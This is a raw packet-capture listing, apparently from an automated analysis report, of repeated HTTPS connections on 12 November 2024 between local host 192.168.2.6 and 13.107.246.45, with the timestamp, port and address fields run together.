                                                        Nov 12, 2024 16:27:20.835983992 CET49860443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:20.835995913 CET4434986013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:20.836030006 CET49860443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:20.836035967 CET4434986013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:20.839519024 CET49865443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:20.839571953 CET4434986513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:20.839644909 CET49865443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:20.839829922 CET49865443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:20.839842081 CET4434986513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:20.878359079 CET4434986113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:20.878814936 CET49861443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:20.878839970 CET4434986113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:20.879307985 CET49861443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:20.879319906 CET4434986113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:20.954368114 CET4434986313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:20.954857111 CET49863443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:20.954895973 CET4434986313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:20.955363989 CET49863443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:20.955368996 CET4434986313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:21.011351109 CET4434986113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:21.011528015 CET4434986113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:21.011594057 CET49861443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:21.011795998 CET49861443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:21.011811018 CET4434986113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:21.011826038 CET49861443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:21.011831045 CET4434986113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:21.015110016 CET49866443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:21.015150070 CET4434986613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:21.015214920 CET49866443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:21.015429974 CET49866443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:21.015444040 CET4434986613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:21.086013079 CET4434986313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:21.086081028 CET4434986313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:21.086144924 CET49863443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:21.086457014 CET49863443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:21.086467028 CET4434986313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:21.086478949 CET49863443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:21.086483002 CET4434986313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:21.089988947 CET49867443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:21.090034962 CET4434986713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:21.090112925 CET49867443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:21.090349913 CET49867443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:21.090363979 CET4434986713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:21.095669031 CET4434986213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:21.096065998 CET49862443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:21.096079111 CET4434986213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:21.096554041 CET49862443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:21.096559048 CET4434986213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:21.226759911 CET4434986213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:21.226886988 CET4434986213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:21.226952076 CET49862443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:21.227111101 CET49862443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:21.227129936 CET4434986213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:21.227158070 CET49862443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:21.227164030 CET4434986213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:21.230227947 CET49868443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:21.230273008 CET4434986813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:21.230384111 CET49868443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:21.230546951 CET49868443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:21.230560064 CET4434986813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:21.249985933 CET4434986413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:21.250451088 CET49864443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:21.250473022 CET4434986413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:21.250958920 CET49864443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:21.250963926 CET4434986413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:21.405308962 CET4434986413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:21.405334949 CET4434986413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:21.405388117 CET4434986413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:21.405407906 CET49864443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:21.405453920 CET49864443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:21.409182072 CET49864443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:21.409205914 CET4434986413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:21.409218073 CET49864443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:21.409223080 CET4434986413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:21.412417889 CET49869443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:21.412458897 CET4434986913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:21.412524939 CET49869443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:21.412727118 CET49869443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:21.412739038 CET4434986913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:21.569201946 CET4434986513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:21.569741964 CET49865443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:21.569772005 CET4434986513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:21.570319891 CET49865443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:21.570323944 CET4434986513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:21.698882103 CET4434986513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:21.698946953 CET4434986513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:21.699064016 CET49865443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:21.699301958 CET49865443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:21.699331045 CET4434986513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:21.699361086 CET49865443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:21.699369907 CET4434986513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:21.703471899 CET49870443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:21.703501940 CET4434987013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:21.703757048 CET49870443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:21.704020023 CET49870443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:21.704032898 CET4434987013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:21.749283075 CET4434986613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:21.750180960 CET49866443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:21.750205040 CET4434986613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:21.752183914 CET49866443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:21.752188921 CET4434986613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:21.817928076 CET4434986713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:21.819037914 CET49867443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:21.819037914 CET49867443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:21.819071054 CET4434986713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:21.819089890 CET4434986713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:21.880270958 CET4434986613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:21.880346060 CET4434986613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:21.880547047 CET49866443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:21.880702019 CET49866443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:21.880702019 CET49866443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:21.880727053 CET4434986613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:21.880737066 CET4434986613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:21.883749008 CET49871443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:21.883797884 CET4434987113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:21.884367943 CET49871443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:21.884654999 CET49871443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:21.884674072 CET4434987113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:21.947237968 CET4434986713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:21.947292089 CET4434986713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:21.947582960 CET49867443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:21.947582960 CET49867443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:21.947674036 CET49867443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:21.947691917 CET4434986713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:21.950563908 CET49872443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:21.950584888 CET4434987213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:21.950723886 CET49872443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:21.950877905 CET49872443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:21.950890064 CET4434987213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:21.990334034 CET4434986813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:21.991245031 CET49868443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:21.991245031 CET49868443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:21.991265059 CET4434986813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:21.991278887 CET4434986813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:22.120331049 CET4434986813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:22.120358944 CET4434986813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:22.120404005 CET4434986813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:22.120486975 CET49868443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:22.120486975 CET49868443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:22.120763063 CET49868443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:22.120763063 CET49868443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:22.120778084 CET4434986813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:22.120785952 CET4434986813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:22.128184080 CET49873443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:22.128226042 CET4434987313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:22.131423950 CET49873443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:22.131423950 CET49873443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:22.131454945 CET4434987313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:22.164527893 CET4434986913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:22.164999008 CET49869443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:22.165024042 CET4434986913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:22.165760040 CET49869443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:22.165764093 CET4434986913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:22.298049927 CET4434986913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:22.298748970 CET4434986913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:22.298877954 CET49869443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:22.298877954 CET49869443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:22.298926115 CET49869443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:22.298949957 CET4434986913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:22.301604986 CET49874443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:22.301650047 CET4434987413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:22.301904917 CET49874443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:22.301904917 CET49874443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:22.301935911 CET4434987413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:22.426103115 CET4434987013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:22.426753044 CET49870443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:22.426779985 CET4434987013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:22.428355932 CET49870443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:22.428360939 CET4434987013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:22.554717064 CET4434987013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:22.555197954 CET4434987013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:22.555265903 CET49870443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:22.555327892 CET49870443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:22.555342913 CET4434987013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:22.555397987 CET49870443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:22.555402994 CET4434987013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:22.558605909 CET49875443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:22.558650970 CET4434987513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:22.558904886 CET49875443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:22.559077024 CET49875443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:22.559096098 CET4434987513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:22.621356964 CET4434987113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:22.621782064 CET49871443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:22.621804953 CET4434987113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:22.622253895 CET49871443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:22.622258902 CET4434987113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:22.704415083 CET4434987213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:22.704869032 CET49872443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:22.704902887 CET4434987213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:22.705315113 CET49872443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:22.705319881 CET4434987213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:22.749810934 CET4434987113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:22.749885082 CET4434987113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:22.749947071 CET49871443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:22.750128984 CET49871443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:22.750154018 CET4434987113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:22.750165939 CET49871443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:22.750170946 CET4434987113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:22.754312038 CET49876443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:22.754333019 CET4434987613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:22.754571915 CET49876443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:22.754762888 CET49876443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:22.754774094 CET4434987613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:22.835855007 CET4434987213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:22.835889101 CET4434987213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:22.835935116 CET4434987213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:22.835956097 CET49872443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:22.835988045 CET49872443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:22.836287022 CET49872443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:22.836306095 CET4434987213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:22.836318970 CET49872443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:22.836324930 CET4434987213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:22.839664936 CET49877443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:22.839704037 CET4434987713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:22.839799881 CET49877443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:22.839946032 CET49877443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:22.839957952 CET4434987713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:22.873929024 CET4434987313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:22.874372959 CET49873443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:22.874392033 CET4434987313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:22.874902964 CET49873443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:22.874910116 CET4434987313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:23.005781889 CET4434987313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:23.005846977 CET4434987313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:23.005907059 CET49873443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:23.006128073 CET49873443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:23.006151915 CET4434987313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:23.006165028 CET49873443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:23.006170988 CET4434987313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:23.009397984 CET49878443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:23.009450912 CET4434987813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:23.009557009 CET49878443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:23.009804964 CET49878443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:23.009824038 CET4434987813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:23.059896946 CET4434987413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:23.060410976 CET49874443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:23.060440063 CET4434987413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:23.060892105 CET49874443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:23.060898066 CET4434987413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:23.195528030 CET4434987413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:23.195734978 CET4434987413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:23.195812941 CET49874443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:23.195971966 CET49874443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:23.195998907 CET4434987413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:23.196012020 CET49874443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:23.196017981 CET4434987413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:23.199548960 CET49879443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:23.199592113 CET4434987913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:23.199785948 CET49879443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:23.200120926 CET49879443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:23.200134039 CET4434987913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:23.284220934 CET4434987513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:23.284845114 CET49875443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:23.284887075 CET4434987513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:23.285547018 CET49875443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:23.285552979 CET4434987513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:23.414057016 CET4434987513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:23.414128065 CET4434987513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:23.414186001 CET49875443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:23.414501905 CET49875443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:23.414520979 CET4434987513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:23.414537907 CET49875443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:23.414545059 CET4434987513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:23.417895079 CET49880443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:23.417936087 CET4434988013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:23.418025017 CET49880443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:23.418270111 CET49880443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:23.418288946 CET4434988013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:23.621525049 CET4434987713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:23.622600079 CET49877443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:23.622600079 CET49877443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:23.622617960 CET4434987713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:23.622629881 CET4434987713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:23.751013041 CET4434987713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:23.751365900 CET4434987713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:23.751499891 CET49877443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:23.751566887 CET49877443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:23.751580954 CET4434987713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:23.751602888 CET49877443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:23.751607895 CET4434987713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:23.754411936 CET49881443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:23.754447937 CET4434988113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:23.754659891 CET49881443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:23.754877090 CET49881443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:23.754887104 CET4434988113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:23.813663006 CET4434987813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:23.814311028 CET49878443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:23.814352989 CET4434987813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:23.814901114 CET49878443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:23.814905882 CET4434987813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:23.868243933 CET4434987613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:23.869326115 CET49876443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:23.869326115 CET49876443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:23.869357109 CET4434987613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:23.869379044 CET4434987613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:23.950566053 CET4434987913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:23.951178074 CET49879443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:23.951201916 CET4434987913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:23.956187963 CET49879443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:23.956197977 CET4434987913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:23.965329885 CET4434987813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:23.965359926 CET4434987813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:23.965410948 CET4434987813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:23.965437889 CET49878443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:23.965584040 CET49878443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:23.965873957 CET49878443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:23.965888977 CET4434987813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:23.965914011 CET49878443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:23.965919018 CET4434987813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:23.972182989 CET49882443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:23.972220898 CET4434988213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:23.974565029 CET49882443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:23.974565029 CET49882443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:23.974596977 CET4434988213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:23.998694897 CET4434987613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:23.998821974 CET4434987613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:23.998866081 CET4434987613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:23.999010086 CET49876443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:23.999078035 CET49876443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:23.999078035 CET49876443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:23.999084949 CET4434987613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:23.999094009 CET4434987613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:24.002109051 CET49883443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:24.002152920 CET4434988313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:24.002356052 CET49883443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:24.002356052 CET49883443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:24.002388954 CET4434988313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:24.082285881 CET4434987913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:24.082350969 CET4434987913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:24.084253073 CET49879443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:24.084253073 CET49879443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:24.084300995 CET49879443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:24.084319115 CET4434987913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:24.091506004 CET49884443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:24.091531992 CET4434988413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:24.091682911 CET49884443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:24.092418909 CET49884443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:24.092427969 CET4434988413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:24.145520926 CET4434988013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:24.189920902 CET49880443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:24.320209026 CET49880443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:24.320242882 CET4434988013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:24.321738958 CET49880443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:24.321748018 CET4434988013.107.246.45192.168.2.6
